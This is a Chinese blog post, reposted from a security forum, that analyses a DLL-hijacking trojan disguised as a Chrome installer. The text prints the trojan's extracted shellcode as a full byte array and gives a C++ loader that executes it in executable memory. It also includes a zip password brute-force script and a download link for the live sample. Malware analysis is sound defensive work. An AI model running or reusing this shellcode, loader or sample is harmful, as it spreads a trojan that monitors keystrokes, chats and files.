一次恶意程序样本全分析之旅，从零基础到精通，收藏这篇就够了！

最新推荐文章于 2025-06-06 01:31:59 发布

程序员_大白

最新推荐文章于 2025-06-06 01:31:59 发布

阅读量576

点赞数 3

分类专栏：程序员学习分享渗透测试文章标签：数据库网络本地部署

本文链接：https://blog.youkuaiyun.com/Python_0011/article/details/145971843

版权

程序员同时被 3 个专栏收录

1193 篇文章

订阅专栏

学习分享

268 篇文章

订阅专栏

渗透测试

199 篇文章

订阅专栏



一  

  

快速分析











---

1.1
---

  

拿到样本第一步，先对样本进行简单快速的分析，判断其是不是恶意程序与病毒，然后才能进行深入分析，不然折腾半天发现是正常程序就尬住了。  
  

我们看这个样本。  

  

![](https://i-blog.csdnimg.cn/img_convert/9bcf869c464837594b75b24d17448e56.jpeg)

  

第一眼看到这个样本，至少可以提取到三个关键信息：1、谷歌图标；2、管理员权限；3、exe可执行程序。

  
这3点显然与样本标题格格不入，很显然，这是样本作者诱惑用户点击该程序的一种社会工程学手段，对于一些未经培训或疏忽大意的用户，在邮箱或其他地方收到该样本后并不会注意到它的异常，而是直接运行，然后就中招了。

  

1.2
---

  

在有了第一个疑点后，我们进一步确定该样本是不是恶意程序。通常来说，要快速判断一个样本（exe类）是不是恶意程序有那么几种方法（如果样本作者水平比较高，那么可能这些方法都看不出了问题）：查看数字签名、查看可疑字符串、查看导出表以及在虚拟机中运行等等。如果这几种方法都不能直接确定该样本是恶意程序，那么—就要凭经验或者进行动静分析了。

  

### 1.2.1

  

我们来看看该样本的数字签名，使用的工具是微软提供的sigcheck，可以在微软官方下载。  

  

![](https://i-blog.csdnimg.cn/img_convert/23f90a808db87602ce186fadb68297f1.jpeg)

  

上面的是我们的样本，下面是一个正常的GoogleChromePortable程序，可以看到在不能签名无法验证之外，其他与正常的程序基本一致，因此我们可以猜测这是一个被修改过（或是被伪装成）的GoogleChromePortable程序。

  

### 1.2.2

  

下面来看看该样本的字符串。使用的依旧是微软提供的strings工具。为了方便，我将提取的字符串长度设置为10以上，同时将输入重定向为txt文件。  

  

![](https://i-blog.csdnimg.cn/img_convert/41d4655c5e13729deacb75d47c881cb2.jpeg)

![](https://i-blog.csdnimg.cn/img_convert/41cfd3be6fa36fb3a308dfb1a98523d4.jpeg)

  

由于字符串太多了，我就不一一截图了。

  
可以看到该样本导入了大量对文件操作的函数，由于我们在上面的分析中已经基本确定该程序是恶意的了，因此该样本导入这些函数一般存在2种可能：一是直接入侵，对受害者的电脑进行文件拷贝等操作，二是该程序只是一个安装程序或病毒前哨站，对受害人电脑继续检查以及为接下来的入侵打好基础（伪装自身或是关闭安全程序等等）。

  

### 1.2.3

  

我们来看看该样本在虚拟机中运行的表现。我所使用的是vm虚拟机，win10 x64版。将样本拖入虚拟机，并使用火绒剑监控样本行为。

  

![](https://i-blog.csdnimg.cn/img_convert/bb0e4791a4798201cd5213b4ca846cfa.jpeg)

  

可以看到样本运行时有着非常多对注册表进行的操作，以及调用了很多重要的dll程序，但奇怪的是，程序运行并没有明显现象，只是有一个一闪而过的窗口，并且该样本的行为好。像并没有什么异常操作，仅仅依靠这些操作并不能将其判断为恶意程序，可是我们在之前的分析中已经基本确定这是一个恶意程序了呀。

  
还记得我们在1.2.2中做出的分析，该样本导入的大量的文件相关函数，但并没有用上，显然样本作者不会将这些函数无意义的导入程序（如果是为了混淆，那么就不止这些函数了）。

  
当时我在分析的时候认为这是样本通过某种方式隐藏了自身，但后来仔细研究过后我才发现这其实是我自身的设置问题。我在虚拟机运行该样本的时候，没有注意的一个细节，就是火绒将该程序报毒了，我当时以为这个报毒对我们的分析没有影响。后来发现，火绒报毒后就会对病毒进行一定的处理，从而导致病毒不能完全执行，因此我们用火绒剑也就监控不到相关行为。

  
![](https://i-blog.csdnimg.cn/img_convert/95c968f929f0c9c1ef5ac7f357463881.jpeg)  
  

现在我们把火绒剑打开后，将火绒本体关闭，并使虚拟机连上网，再看看样本做了什么。现在可以看到样本对文件以及网络方面做出的一系列动作了。  

  

![](https://i-blog.csdnimg.cn/img_convert/30585f9f136db6734f7174256133c7be.jpeg)

  

根据这些行为，我们很容易看到该样本的恶意操作，如对系统重要文件进行修改，连接网络创建隐藏文件等等。

  
在这些行为中我们还可以发现比较重要的一部分：  

  

![](https://i-blog.csdnimg.cn/img_convert/b401d20d571526cda54b7c8f0dbf2072.jpeg)

  

可以看到，样本在最后创建了一个可执行文件，这里我们先按下不表。

二

深入分析


  

---

2.1 查壳
------

###   

### 2.1.1

  

我们所有的分析都是建立在无壳的基础上的，注意不是混淆。

  
![](https://i-blog.csdnimg.cn/img_convert/2a0d8b8f4edd6bedae25fe4d09da0ca2.jpeg)  

  

根据提示我们得知该样本是一个用NSIS打包制成的安装系统，同时根据脱壳提示，我们用7z打开该样本，得到如下文件：

  

![](https://i-blog.csdnimg.cn/img_convert/14478897cfeb98212c6ac8d08dce9e18.jpeg)  
  

查阅相关信息我们得知这些dll文件是NSIS的打包文件。根据文件名称我们很容易能猜到这些文件的功能，至于这些文件有什么用，我们先放在一边。

  

### 2.1.2

  

在2.1.1的分析中，我们知道该样本其实是一个安装程序，这也可以通过分析样本的行为得知：

  
![](https://i-blog.csdnimg.cn/img_convert/a0c55a1c311e786d11e98968cbe560a3.jpeg)  

  

如上图所示，我们可以猜出样本从网上下载样本本体，并将其安装在C:\\Users\\Public\\Videos\\0aJz4Vu下，因此我们的深入分析还得从样本本体入手。

  
下载下来的文件如下：

  
![](https://i-blog.csdnimg.cn/img_convert/50a2804594306517187e179671959c6d.jpeg)  
  

我们先看看这些文件的详细信息，打开dat文件以及exe文件的详细信息。

  

![](https://i-blog.csdnimg.cn/img_convert/ad3484270db7315f7b434b185318bdd4.jpeg)

  

我们可以看到dat文件经过加密，同时发现exe文件有很详细的文件信息，看到这里的时候我初步怀疑exe是一个正常的程序，使用sigcheck检查后发现这其实就是一个正常的exe程序。

  
![](https://i-blog.csdnimg.cn/img_convert/982eebe77069b4fe33fd723fca022000.jpeg)  
  

通过前面几步的分析不难猜出这是一个经典“白加黑“类型的恶意程序，即通过将自身伪装成正常程序的一部分以骗过安全程序的检查。而我们要研究的恶意程序也就隐藏在.dat .jpg .xml这几个文件中了（仔细检查会发现两个dat文件和exe文件其实是同一个文件）。

  

2.2 拆包
------

###   

### 2.2.1

  

在上面的分析中我们知道，真正的恶意代码就隐藏在edge.jpg、edge.xml、vVehX.dat这三个文件中。在这三个文件中，我们首先来看vVehX.dat这个文件（在前面的分析中，我们得出这应该是一种白加黑类型的恶意程序，因此首先怀疑的是与vVehX.exe同名的数据文件），打开这个文件的数据，直接就能看到这其实是一个压缩包文件（PK是zip压缩包的文件头）。

  
![](https://i-blog.csdnimg.cn/img_convert/8cb6b67795191bf4107477dd6ca98b69.jpeg)  
  

我们将后缀改为zip并解压，很遗憾，压缩包加了密码，因此我们还要再找到密码。

  
![](https://i-blog.csdnimg.cn/img_convert/3863a923d66db64dd11c1f01ff367361.jpeg)

###   

### 2.2.2

  

想要找到密码，首先要找到密码在哪。我们不妨来分析一下：首先密码大概率是硬编码在代码中的，因为本地的exe程序是先要解出恶意代码本体，然后执行恶意代码才能连接上远程服务器。至于为什么不是反着来的，大家可以自己思考一些。

  
既然密码是硬编码在代码中的，那么很明显，密码一定是在vVehX.exe中，而不是2023财会人员薪资补贴调整新政策所需材料.exe中的。那么接下来我们就从vVehX.exe中找到密码。

  

### 2.2.3

  

首先我们查壳。

  
![](https://i-blog.csdnimg.cn/img_convert/f33d4887be00ba09f0a98c1dc413ab89.jpeg)  
  

经典的UPX压缩壳，网上有很多现成的脱壳工具，我就不一一赘述了。  
  

脱壳后我们使用ida打开，查找字符串，首先我们查找关键字key，如果能直接找到那就--，很遗憾，作者并没有这么傻，但是没关系，在我浏览字符串的时候我看到一个关键字：

  
![](https://i-blog.csdnimg.cn/img_convert/b553eda98dc62318a80118bde16e85b7.jpeg)  

  

DynaZIP UnZIP，这是一个c++的压缩包库。但是，如果你认为我要从这个库的压缩和解压算法入手，找到该程序调用这个库的地方，然后顺藤摸瓜找到关键函数，并在OllyDbg中对关键函数下断点，然后单步调试找到密码的话，那你就错了。因为我想到了一个更好的方法：既然密码是硬编码在代码中的，那我就可以将文件中的字符串提取出来，作为密码本，让程序帮我们一个一个试。（当然，如果你说作者可能将密码拆开存储，在使用的时候才将密码组合，那就只能老老实实用第一种方法咯）。但很幸运，我的方法成功了。

  
我写了一个简单的python程序，用于暴力破解密码，具体见下：

import zipfile
import os
import time
def extract_with_password(zip_file, password_file, output_dir):
# 创建输出目录
os.makedirs(output_dir, exist_ok=True)
# 打开密码本并读取密码列表
with open(password_file, ‘r’, encoding=‘UTF-8’) as pass_file:
passwords = pass_file.readlines()
start_time = time.time() # 开始计时
attempt_count = 0 # 记录解密尝试次数
# 尝试每个密码来解压缩文件
for password in passwords:
password = password.strip() # 去除密码两端的空白字符
if not password: # 跳过空密码
continue
attempt_count += 1
try:
with zipfile.ZipFile(zip_file, ‘r’) as zip_ref:
zip_ref.extractall(output_dir, pwd=password.encode(‘UTF-8’))
end_time = time.time() # 结束计时
duration = end_time - start_time # 计算耗时
print(f"解压成功，使用密码: {password}“)
print(f"解密尝试次数: {attempt_count}”)
print(f"解密耗时: {duration:.2f} 秒")
break # 成功解压后结束循环
except zipfile.BadZipFile:
print(“错误：文件不是有效的zip文件”)
break
except RuntimeError as e:
if “Bad password” in str(e):
print(f"密码错误: {password}")
else:
continue # 继续尝试下一个密码
# 解密加密文件
decrypt_encrypted_files(zip_file, output_dir, password)
def decrypt_encrypted_files(zip_file, output_dir, password):
with zipfile.ZipFile(zip_file, ‘r’) as zip_ref:
for file_info in zip_ref.infolist():
if file_info.flag_bits & 0x01:
file_info.flag_bits ^= 0x01
try:
zip_ref.extract(file_info, output_dir, pwd=password.encode(‘UTF-8’))
except Exception as e:
continue # 继续解压下一个文件
if __name__ == “__main__”:
zip_file = “压缩包路径”
password_file = “密码本路径txt”
output_directory = “输出路径”
extract_with_password(zip_file,password_file,output_directory)
#解密过程中会遇到未知错误，此时找到错误前的最后一个错误密码，该密码的下一个密码即为导致错误的密码，你可以使用最后一个错误密码定位到该密码，然后手动测试并将其删除（注意保存），然后重新运行即可。该错误并不常见，在我的尝试中三千多行密码只出现了不到10个，当然如果有python大佬能将其解决更好


  

虽然代码还存在许多问题，但我还是成功解开并取得密码。

  
![](https://i-blog.csdnimg.cn/img_convert/9167005f5cb5e35b19a797ac295e1752.jpeg)  

  

解开压缩包内容如下：

  
![](https://i-blog.csdnimg.cn/img_convert/2fd7ea535cfcad891b8ea095cd5e36be.jpeg)

  

---

2.3二次拆包
-------

  

### 2.3.1

  

根据我们第一次拆包的结果，首先我们将目光锁定在\_TUProj.dat文件上，理由请参考前面的分析。打开这个文件，我们可以看到在文件开始有一段代码，下面是很长的未知定义。

  
![](https://i-blog.csdnimg.cn/img_convert/67135a0a6af7803797f01e63fbacd7bb.jpeg)  
  

观察代码，很明显能看到关键点，一段很长的shellcode代码，这段代码也不难理解，大体上就是调用dll创建内容，将shellcode复制到内存并执行。那么就不难猜到我们要分析的重点就是这段shellcode代码。

  
这里我给出两种解法来分析这段shellcode代码：1、将这段shellcode代码转为二进制的形式，拖入ida让ida识别并转为伪c代码。这种方法的好处是操作简单，ida转化后的伪c代码也很容易阅读，缺点是ida需要特定插件或全功能版才能识别我们转换后的二进制代码，并且我们只能静态分析代码，需要比较深厚的代码功底。如果你想使用这种方法，这里有一位大佬的文章，我看了应该是同一份样本，可以参考一下：TrueUpdate白加黑木马分析保姆级教程 - VxerLee昵称已被使用 - 博客园 (https://www.cnblogs.com/VxerLee/p/17736138.html#tid-SAw8Rm)

  
2、很显然这段shellcode是可以执行的，并且就是这段代码的核心，虽然我们不知道上图的代码是用什么语言写的，并且没头没尾，但是这并不妨碍我们用c++（py也可以，但需要多一步打包工作）重构并实现这段代码，下面是我用c++重构的代码，核心依旧是执行shellcode，编译运行后我们就得到了exe文件，这样我们就可以在ollydbg中调试该shellcode代码了。

#include
#include <windows.h>
// 定义ShellCode代码
unsigned char g_table_char[] = {233,11,3,0,0,204,204,204,204,204,204,204,204,204,204,204,100,161,48,0,0,0,133,192,120,13,139,64,12,139,64,20,139,0,139,0,139,64,16,195,204,204,204,204,204,204,204,204,85,139,236,131,236,24,100,161,48,0,0,0,83,86,87,139,64,12,137,77,240,139,112,12,139,86,24,137,85,252,133,210,15,132,162,0,0,0,139,66,60,51,255,139,78,44,139,94,48,139,54,139,68,16,120,137,69,244,137,117,248,133,192,116,121,139,195,15,172,193,16,15,183,241,51,201,133,246,116,26,15,190,20,11,193,207,13,128,60,11,97,124,3,131,199,224,65,3,250,59,206,114,233,139,85,252,139,69,244,51,219,3,194,137,69,244,139,72,32,3,202,57,88,24,118,57,102,144,139,49,51,192,3,242,131,193,4,137,77,236,15,31,64,0,138,22,141,118,1,193,200,13,15,190,202,3,193,132,210,117,239,139,85,252,3,199,59,69,240,116,38,139,69,244,67,139,77,236,59,88,24,114,201,139,117,248,139,86,24,137,85,252,133,210,15,133,94,255,255,255,51,192,95,94,91,139,229,93,195,139,117,244,95,139,70,36,141,4,88,15,183,12,16,139,70,28,94,91,141,4,136,139,4,16,3,194,139,229,93,195,85,139,236,131,236,100,83,86,87,139,249,137,125,244,232,221,254,255,255,139,208,51,246,139,66,60,57,116,16,124,117,7,51,246,233,156,0,0,0,139,68,16,120,133,192,116,241,139,92,16,24,133,219,116,233,139,76,16,36,139,124,16,32,3,202,139,68,16,28,3,250,3,194,137,77,252,51,201,137,69,248,75,139,4,143,3,194,128,56,71,117,78,128,120,1,101,117,72,128,120,2,116,117,66,128,120,3,80,117,60,128,120,4,114,117,54,128,120,5,111,117,48,128,120,6,99,117,42,128,120,7,65,117,36,128,120,8,100,117,30,128,120,9,100,117,24,128,120,10,114,117,18,128,120,11,101,117,12,128,120,12,115,117,6,128,120,13,115,116,7,65,59,203,118,163,235,15,139,69,252,139,117,248,15,183,4,72,139,52,134,3,242,139,125,244,141,69,156,137,55,80,199,69,156,76,111,97,100,199,69,160,76,105,98,114,199,69,164,97,114,121,65,198,69,168,0,232,9,254,255,255,80,139,7,255,208,141,77,196,137,71,4,81,141,77,208,199,69,208,85,115,101,114,81,199,69,212,51,50,46,100,102,199,69,216,108,108,198,69,218,0,199,69,196,77,101,115,115,199,69,200,97,103,101,66,199,69,204,111,120,65,0,255,208,80,139,7,255,208,137,71,8,141,69,184,80,199,69,184,67,114,101,97,199,69,188,116,101,70,105,199,69,192,108,101,65,0,232,164,253,255,255,80,139,7,255,208,137,71,12,141,69,172,80,199,69,172,71,101,116,70,199,69,176,105,108,101,83,199,69,180,105,122,101,0,232,126,253,255,255,80,139,7,255,208,137,71,16,141,69,232,80,199,69,232,82,101,97,100,199,69,236,70,105,108,101,198,69,240,0,232,91,253,255,255,80,139,7,255,208,185,76,119,38,7,137,71,20,232,105,253,255,255,141,77,220,137,71,36,81,199,69,220,110,116,100,108,199,69,224,108,46,100,108,102,199,69,228,108,0,255,208,185,80,125,163,126,232,66,253,255,255,185,210,138,43,141,137,71,28,232,53,253,255,255,137,71,32,95,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,85,139,236,131,228,248,131,236,40,141,12,36,232,255,253,255,255,141,12,36,232,7,0,0,0,139,229,93,195,204,204,204,85,139,236,131,236,116,83,86,87,106,0,106,0,106,3,106,0,106,1,139,249,199,69,172,101,100,103,101,104,0,0,0,128,141,69,172,199,69,176,46,120,109,108,80,139,71,12,102,199,69,180,0,0,255,208,139,79,16,139,240,106,0,86,255,209,139,79,28,80,137,69,244,199,69,220,0,0,0,0,255,209,139,79,20,131,196,4,139,216,141,69,220,137,93,216,106,0,80,255,117,244,83,86,255,209,15,182,67,1,52,48,138,11,4,48,128,241,48,136,67,1,128,193,48,15,182,67,2,52,48,136,11,4,48,136,67,2,15,182,67,3,52,48,4,48,136,67,3,15,182,67,4,52,48,4,48,106,32,136,67,4,141,69,140,106,0,80,139,71,32,255,208,139,125,244,185,181,65,217,94,137,93,140,137,125,144,232,65,252,255,255,185,45,177,136,148,137,69,232,137,69,148,232,49,252,255,255,185,19,156,191,189,137,69,212,137,69,152,232,33,252,255,255,185,104,253,133,128,137,69,204,137,69,156,232,17,252,255,255,185,179,114,233,90,137,69,236,137,69,160,232,1,252,255,255,185,229,92,239,63,137,69,208,137,69,164,232,241,251,255,255,51,246,137,69,200,137,69,168,137,117,252,131,255,64,15,134,55,3,0,0,184,77,90,0,0,102,57,3,15,133,41,3,0,0,139,75,60,137,77,240,141,129,248,0,0,0,59,248,15,130,21,3,0,0,3,203,137,77,248,129,57,80,69,0,0,15,133,4,3,0,0,102,139,65,22,186,2,32,0,0,102,35,194,102,59,194,15,133,239,2,0,0,184,224,0,0,0,102,57,65,20,15,133,224,2,0,0,15,183,121,6,51,210,137,125,224,133,255,116,110,129,193,8,1,0,0,15,31,0,139,65,4,3,1,59,69,244,15,135,188,2,0,0,66,131,193,40,59,215,124,234,139,69,248,51,210,139,117,224,139,72,56,141,152,8,1,0,0,139,64,84,72,137,77,228,3,193,247,241,139,248,15,175,249,139,83,248,57,19,139,77,228,15,79,19,141,91,40,3,83,212,141,65,255,3,194,51,210,247,241,15,175,193,59,248,15,77,199,139,248,131,238,1,117,215,139,93,216,235,22,139,69,240,51,210,139,73,56,139,68,24,84,72,3,193,247,241,139,248,15,175,249,133,255,15,132,71,2,0,0,106,64,104,0,16,0,0,141,69,216,137,125,216,80,106,0,141,69,252,80,106,255,255,85,212,139,117,252,133,246,15,132,35,2,0,0,139,125,240,15,183,84,31,6,139,194,141,12,128,139,68,31,84,141,60,200,51,201,133,255,126,23,138,4,25,136,4,49,65,139,117,252,59,207,124,242,139,77,248,15,183,81,6,235,3,139,77,248,51,192,51,255,137,69,244,102,59,250,115,74,141,145,8,1,0,0,15,31,0,139,74,252,133,201,116,36,131,58,0,116,31,141,60,49,51,201,57,10,118,22,139,66,4,3,193,138,4,24,136,4,57,65,59,10,114,240,139,117,252,139,69,244,139,77,248,64,137,69,244,131,194,40,15,183,65,6,57,69,244,139,69,244,124,191,139,145,160,0,0,0,133,210,116,119,131,185,164,0,0,0,0,118,110,139,198,141,60,50,43,65,52,139,79,4,137,69,228,139,7,3,193,116,87,199,69,212,0,48,0,0,199,69,224,0,160,0,0,141,89,248,186,0,0,0,0,209,235,116,49,15,183,68,87,8,139,200,129,225,0,240,0,0,102,59,77,212,116,6,102,59,77,224,117,16,139,77,228,37,255,15,0,0,3,7,1,12,48,139,117,252,66,59,211,124,210,139,79,4,139,4,15,3,249,139,79,4,3,193,117,183,139,77,248,139,129,128,0,0,0,133,192,15,132,10,1,0,0,139,20,48,141,12,48,137,77,224,133,210,15,132,225,0,0,0,139,93,236,139,65,16,3,198,199,69,244,0,0,0,0,137,69,212,141,4,50,137,69,228,139,65,12,3,198,80,141,69,192,80,255,211,106,1,141,69,192,80,141,69,184,80,255,85,208,141,69,244,80,141,69,184,80,106,0,106,0,255,85,204,141,69,184,80,255,85,200,139,77,244,133,201,15,132,164,0,0,0,139,117,228,51,255,139,6,133,192,116,110,51,219,199,69,240,0,0,0,0,133,192,121,24,15,183,192,133,192,15,132,129,0,0,0,141,85,240,82,80,106,0,81,255,85,232,235,37,139,117,252,131,192,2,3,198,116,109,80,141,69,192,80,255,85,236,141,69,240,80,106,0,141,69,192,80,255,117,244,255,85,232,139,117,228,139,69,240,133,192,116,72,139,77,212,71,137,4,11,141,28,189,0,0,0,0,139,4,51,133,192,116,5,139,77,244,235,151,139,93,236,139,77,224,139,117,252,131,193,20,137,77,224,139,17,133,210,15,133,34,255,255,255,139,69,248,137,112,52,139,77,252,139,64,40,81,106,1,106,0,3,193,255,208,139,117,252,95,139,198,94,91,139,229,93,195,204,204,204,204,204,204,204,204,204,204,204,204,204};
int main()
{ // 定义需要调用的Windows API函数名称
const char* VirtualAlloc = “VirtualAlloc”;
const char* VirtualProtect = “VirtualProtect”;
// 定义需要加载的动态链接库（DLL）的路径
const char* kernel32 = “kernel32.dll”;
// 计算字符集合的长度
int g_Len = sizeof(g_table_char) / sizeof(g_table_char[0]);
// 加载动态链接库
HMODULE hKernel32 = LoadLibrary(kernel32);//这里会报错，但不影响执行
if (hKernel32 == NULL) {
std::cerr << “Failed to load kernel32.dll\n”;
return 1;
}
// 获取函数指针
LPVOID (*ptrVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
ptrVirtualAlloc = (LPVOID(*)(LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hKernel32, VirtualAlloc);
if (ptrVirtualAlloc == NULL) {
std::cerr << “Failed to get VirtualAlloc function\n”;
FreeLibrary(hKernel32);
return 1;
}
// 分配内存
LPVOID g_Addr = ptrVirtualAlloc(NULL, g_Len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (g_Addr == NULL) {
std::cerr << “Failed to allocate memory\n”;
FreeLibrary(hKernel32);
return 1;
}
// 写入ShellCode到分配的内存中
memcpy(g_Addr, g_table_char, g_Len);
// 创建线程执行ShellCode
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)g_Addr, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << “Failed to create thread\n”;
VirtualFree(g_Addr, 0, MEM_RELEASE);
FreeLibrary(hKernel32);
return 1;
}
// 等待线程结束
WaitForSingleObject(hThread, INFINITE);
// 释放内存和关闭库
VirtualFree(g_Addr, 0, MEM_RELEASE);
CloseHandle(hThread);
FreeLibrary(hKernel32);
return 0;
}


  

我们在ollydbg中调试该程序，虽然我们并不知道这段shellcode代码具体是什么，但是我们可以猜到这段shellcode并不是恶意程序的本体，虽然这段shellcode看着挺长的，但远远不到能完整执行一个恶意程序的程度。因此我们可以猜测恶意程序的本体隐藏在那几个jpg文件或xml文件。（为什么要分析这些，因为我们需要找到shellcode的突破点，而不是一步一步的调试代码。在分析完成后，你应该知道我们要怎么突破这段shellcode代码了）

  

### 2.3.2

  

我们在ollydbg中给程序下以下关于文件操作的断点，还有我最爱的内存申请函数VirtualAlloc。

  
![](https://i-blog.csdnimg.cn/img_convert/2c9953f9268692f10b259d14beddeade.jpeg)  
  

啪的一下，很快我们就找到了第一个关键字-edge.xml ，注意右下角的堆栈。

  
![](https://i-blog.csdnimg.cn/img_convert/7b1f02ca9a2f35d0c56544c11601bce0.jpeg)  
  

在这里我们往下单步步过，很快又看到一个关键字-malloc函数。

  
![](https://i-blog.csdnimg.cn/img_convert/8b520dd71ada99a24015175652bacb54.jpeg)  

  

我们将malloc函数，我们将函数的返回值（EAX）即申请的内存空间地址右键在数据窗口中跟随，继续往下调试，或在该地址下硬件断点。很快我们找到了读取文件数据的操作，并且刚才的空间也填满了数据。

  

![](https://i-blog.csdnimg.cn/img_convert/d438130236a06abff80e2c6580ebaba8.jpeg)  
  

继续往下调试，很快我们有看到了疑似解密的操作。  

  

![](https://i-blog.csdnimg.cn/img_convert/e26ef8d25f4c9cc4edc418baaf6b126d.jpeg)

  

执行完这段代码，并且后面没有在对这些数据进行解密的操作后，我们得到了edge.xml文件解密后的数据。  

  

![](https://i-blog.csdnimg.cn/img_convert/f5d1dc86a2042c6a15e651a7d8408f60.jpeg)

  

很明显这是一个exe文件，我们将数据保存下来。

  
![](https://i-blog.csdnimg.cn/img_convert/7716f14af471d28e753e47cf66d66748.jpeg)  

  

我们在010editor中检查保存下来的文件，我们在文件尾部可以看到一堆00后面跟着一些无用数据，这应该是ollydbg保存超范围了，删掉即可。（我已经删掉了，就不给你们截图了）。

  

### 2.3.4

  

继续回到我们的调试，继续往下执行代码，很快我们又找到一个关键点。  

  

![](https://i-blog.csdnimg.cn/img_convert/f0a0908a27f49eed3f75a89e1fe76ae4.jpeg)

  

可以看到这是edge.jpg文件的读取，重复刚才的操作，不过要注意这里会有多次内存分配，并且执行完成后很快就将内存权限移交，如果不注意很容易错过。

  
![](https://i-blog.csdnimg.cn/img_convert/2a458904ce6c8a3d197dbe60e75483f3.jpeg)![](https://i-blog.csdnimg.cn/img_convert/e010c43cd3e4bbb057ab33e60d1bc46a.jpeg)  

  

可以看到地址从10000000一路分配到了1005C000，这是最后一次分配，在这里我们将地址为10000000的内容dump下来。  

  

![](https://i-blog.csdnimg.cn/img_convert/fd983d555405a6e986d3d046567b1ecf.jpeg)

  

这样我们就得到了edge.jpg的解密文件。我们的调试就到此为止（代码并未结束，因为程序会创建新的线程执行解密后的文件），在这次调试中我们成功得到两个解密文件，接下来就是对这两个文件进行解析。

  
![](https://i-blog.csdnimg.cn/img_convert/96b56a7d9e720883836b43e68f0033f9.jpeg)

  

===

2.4 代码解析
========

  

---

2.4.1
-----

  

在解出这两个文件后，我仔细思考了一下调试过程，我们在调试得到第一个文件（edge.xml）后，继续运行程序，程序停到的并不是下一个文件的解密位置，而是中间夹有线程创建函数。当时我并没有意识到问题，到现在需要分析这两个文件的时候我才意思到，恶意代码的本体应该只有一份，或者说你并不会将一个完整的功能拆成两个exe文件（一般情况下）。因此，根据我们的分析与调试过程，我们可以猜测shellcode的实际功能只有一个，即解密出第一个文件，然后创建新的线程运行第一个解密文件，而第一个解密文件的功能则是解密出第二个文件并执行。（这也是我们在解密第二个文件的时候会出现无法读取内存的原因，因为该内存已被移交给新的线程执行）

  

验证方法也很简单，我们可以在编写c++代码时添加一个弹窗提示我们shellcode代码已经执行完成，或者用ida查看代码。

  
但是我懒，所以就不验证了，并且我们分析的目的也不是要确定这个，而是猜测这两个文件的功能，便于我们的分析（如果没有先前分析或执行程序，直接用ida查看代码是很痛苦的）。

  
我们用ida打开edgexml文件（也可以用ollydbg进行调试，不过我们现在是要进行代码分析，显然ida更好）。

  
进入到DllMain函数，可以发现两个关键函数。

  
![](https://i-blog.csdnimg.cn/img_convert/a78c0de5dc75542d79978a8121283459.jpeg)  
  

打开这两个函数，可以看到类似于解密代码，具体的分析我就不给你们做了，代码太长了。

  
![](https://i-blog.csdnimg.cn/img_convert/c7282af643e59bde4a9d0fbd74bf39a8.jpeg)![](https://i-blog.csdnimg.cn/img_convert/afe08fd46519a5f01b8e7d83236ea30a.jpeg)

###   

### 2.4.2

  

我们用ida打开edgejpg文件。查看导出表，可以看到edge函数（DllEntryPoint啥也没有）。

  
![](https://i-blog.csdnimg.cn/img_convert/deba0d6281f639ca025135ef5d54727f.jpeg)  

  

点进来我们就看到了该恶意程序的真正核心了。

  
第一部分是对一些文件进行操作。

  
![](https://i-blog.csdnimg.cn/img_convert/3a8ff9fba9eca7b22651e6c046968abc.jpeg)  
  

第二部分是一些反杀与反调试的操作。

  
![](https://i-blog.csdnimg.cn/img_convert/341c153f45304e25d1c726ce9302dbee.jpeg)  
![](https://i-blog.csdnimg.cn/img_convert/b76256887a1f5dc5f4a60270e0835542.jpeg)  

  

![](https://i-blog.csdnimg.cn/img_convert/6b424ab0e2851e8ca38fa424cadedf88.jpeg)

  

还记着我们在开始时分析该样本时无法看到相关行为，当时我以为时火绒的问题，看来是我错怪火绒了，样本确实通过某种方式在隐藏自己，不过当我们关掉火绒仅仅打开火绒剑时很神奇的避开了样本的检查手段（有种屎山代码以一种奇怪方式运行起来的感觉）。

  
接下来是一些创建线程的操作，这应该是创建多个线程以执行多种入侵/攻击行为。

  
![](https://i-blog.csdnimg.cn/img_convert/a4f9f7ccdd4e43963ad57eac2882d909.jpeg)  
  

接下来我们可以看到，样本在这里连接上远程服务器，这与我们之前在火绒剑看到的样本行为一致。

  
![](https://i-blog.csdnimg.cn/img_convert/a8bf1aecf4bac4f1e95051bb374ca0e9.jpeg)  

  

请注意，我只是挑了一部分比较重要的展示出来，并没有进行全代码解析，如果大家感兴趣可以自行分析。

  

![](https://i-blog.csdnimg.cn/img_convert/3c4766e3f2fac054b9a3cdf331cad39e.jpeg)

  

![](https://i-blog.csdnimg.cn/img_convert/881e2559692ccd015ced846109b3218b.jpeg)![](https://i-blog.csdnimg.cn/img_convert/b344f71b0760760c54cb123a1397f909.jpeg)  
  

键盘监控 聊天程序监控 电脑文件监控

  
2.4.3 至此我们就完整得到恶意程序的所有核心，以及各种恶意行为。我们的深入分析也就到处为止。

三

总结


  

---

3.1
---

  

在本次样本分析中，我们从快速分析入手，通过观察，字符串，数字签名等方式快速判断样本的安全性，然后我们通过查壳以及样本行为分析成功找到样本释放出的文件，再后来我们通过暴力拆解的方式成功解出第一层包，最后我们通过c++重构代码，模拟样本行为，成功使用ollydbg对恶意程序进行调试并解出恶意程序本体。

  

3.2
---

  

在分析过程中我在网上找到了同一家族的样本分析TrueUpdate白加黑木马分析保姆级教程 - VxerLee昵称已被使用 - 博客园 (https://www.cnblogs.com/VxerLee/p/17736138.html#tid-fWrjC8)，虽然样本是一样的，但我还是想办法使用我的方法对样本进行分析，对比这位大佬的分析，我的方法有很多取巧的成分，或者说我的分析方法不需要过多的脑力消耗，因此我认为我的样本分析还是很有参考意义的。

  

3.3
---

  

最后给出样本分析类型：Trojan.Win32.Dllhijack.TrueUpdate  
样本：链接：https://pan.baidu.com/s/1ipc4-FS2osbvvIjd3r7uZw?pwd=lnvk  
提取码：lnvk

  

  

  

![](https://i-blog.csdnimg.cn/img_convert/17add055414349993ab623ad3e766d39.png)

  

**看雪ID：AnnXMY**

https://bbs.kanxue.com/user-home-994584.htm

\*本文为看雪论坛优秀文章，由 AnnXMY 原创，转载请注明来自看雪社区

  ## **黑客/网络安全学习路线**

对于从来没有接触过黑客/网络安全的同学，目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。

大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

